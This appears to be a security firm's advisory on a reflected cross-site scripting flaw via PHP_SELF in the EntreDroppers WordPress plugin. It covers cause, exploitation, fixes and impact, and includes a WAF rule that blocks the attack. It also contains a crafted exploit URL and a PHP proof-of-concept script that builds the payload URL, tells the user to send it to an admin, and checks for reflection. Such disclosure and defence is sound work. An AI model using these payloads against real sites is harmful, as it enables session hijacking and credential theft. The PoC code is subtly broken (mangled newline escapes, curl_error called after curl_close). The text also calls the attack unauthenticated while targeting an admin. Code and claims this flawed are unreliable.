Atomic Edge analysis of CVE-2026-8628 (metadata-based):
This is a reflected cross-site scripting (XSS) vulnerability found in the EntreDroppers WordPress plugin, version 1.1.2 and earlier. The vulnerability allows unauthenticated attackers to inject arbitrary web scripts into pages via the PHP_SELF parameter. The CVSS score is 6.1 (medium severity), with a network attack vector, low attack complexity, and no privileges required, though user interaction is required.
The root cause is insufficient input sanitization and output escaping when the plugin uses the PHP_SELF variable in the form action attribute. PHP_SELF contains the path portion of the current script URL, including path-info, without any sanitization. The plugin likely uses $_SERVER[‘PHP_SELF’] directly in an HTML form tag’s action attribute without escaping or sanitizing the value. This is a classic XSS pattern that stems from the plugin developer either not escaping the server variable or doing so incorrectly. Atomic Edge analysis infers this from the CWE-79 classification and the description’s mention of “insufficient input sanitization and output escaping” specifically for PHP_SELF.
The exploitation method is straightforward. An attacker crafts a URL that includes malicious JavaScript in the path-info segment of the request, for example, /wp-admin/admin.php/%22%3E%3Cscript%3Ealert(0)%3C/script%3E/?page=EntreDroppers.php. When a victim clicks on this link, the plugin’s admin page processes the request. The PHP_SELF variable reflects the attacker-controlled path-info directly into the HTML form’s action attribute without escaping, causing the browser to execute the injected script. The attack does not require authentication, and the victim only needs to click the link. The payload is delivered via the URL path, making it effective for phishing or social engineering campaigns.
Remediation requires the plugin developer to properly escape the PHP_SELF value before embedding it in HTML. The fix should use WordPress’s built-in esc_url() or esc_attr() functions when outputting the server variable into form action attributes. Alternatively, the plugin could avoid using PHP_SELF entirely and use admin_url() with a static path instead. Since no patched version is available from WordPress.org, users should disable the plugin or implement a virtual patch until a fix is released.
The impact of successful exploitation is limited to reflected XSS. An attacker can inject arbitrary scripts into the context of the WordPress admin area. This can lead to session hijacking, credential theft, redirection to malicious sites, or defacement. However, the attack requires user interaction (clicking a crafted link) and does not allow direct data modification or elevation of privileges. The scope is changed because the injected script can affect the broader site, but the CVSS impact values for confidentiality and integrity are low.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-8628 (metadata-based)
# This rule blocks reflected XSS attacks targeting the EntreDroppers plugin via PHP_SELF
# The attack vector: /wp-admin/admin.php/<payload>/?page=EntreDroppers.php
# We block requests to admin.php where the path-info contains XSS patterns and the page parameter matches the plugin slug.
SecRule REQUEST_URI "@rx ^/wp-admin/admin.php/"
"id:20268628,phase:2,deny,status:403,chain,msg:'CVE-2026-8628 EntreDroppers Reflected XSS via PHP_SELF',severity:'CRITICAL',tag:'CVE-2026-8628',tag:'WordPress',tag:'XSS'"
SecRule ARGS_GET:page "@streq EntreDroppers.php" "chain"
SecRule PATH_INFO "@rx <script[^>]*>.*</script[^>]*>" "t:urlDecode,t:lowercase"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-8628 - EntreDroppers <= 1.1.2 - Reflected Cross-Site Scripting via PHP_SELF Parameter
// This PoC demonstrates how an attacker can exploit the reflected XSS vulnerability
// All payload parameters are configurable below
$target_url = 'http://example.com'; // Change this to the target WordPress URL
$plugin_page = 'EntreDroppers.php'; // The plugin's admin page slug
// The malicious payload is injected into the path-info segment of the URL
// PHP_SELF reflects the path portion, so we encode the XSS payload in the URL path
$payload = '"><script>alert("XSS");</script>';
// Construct the malicious URL
// The payload is placed in the path-info after the script name
$exploit_url = rtrim($target_url, '/') . '/wp-admin/admin.php/' . urlencode($payload) . '/?page=' . $plugin_page;
echo "[+] Atomic Edge CVE-2026-8628 PoCn";
echo "[+] Exploit URL: " . $exploit_url . "n";
echo "[+] Send this link to an authenticated admin user.n";
echo "[+] Upon clicking, the injected script executes in their browser.nn";
// To verify, we can make a request and check if the payload is reflected in the response
// Note: PHP_SELF reflection happens server-side, so we send a raw HTTP request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code === false) {
echo "[!] Error: Could not reach target. Response: " . curl_error($ch) . "n";
exit(1);
}
// Check if the payload is reflected in the response
// We look for the script tag in the form action attribute or anywhere in HTML
if (strpos($response, '<script>alert("XSS");</script>') !== false) {
echo "[+] SUCCESS: Payload reflected in response. Vulnerability confirmed.n";
} else {
echo "[-] Payload not found in response. The target may be patched or not vulnerable.n";
}
?>
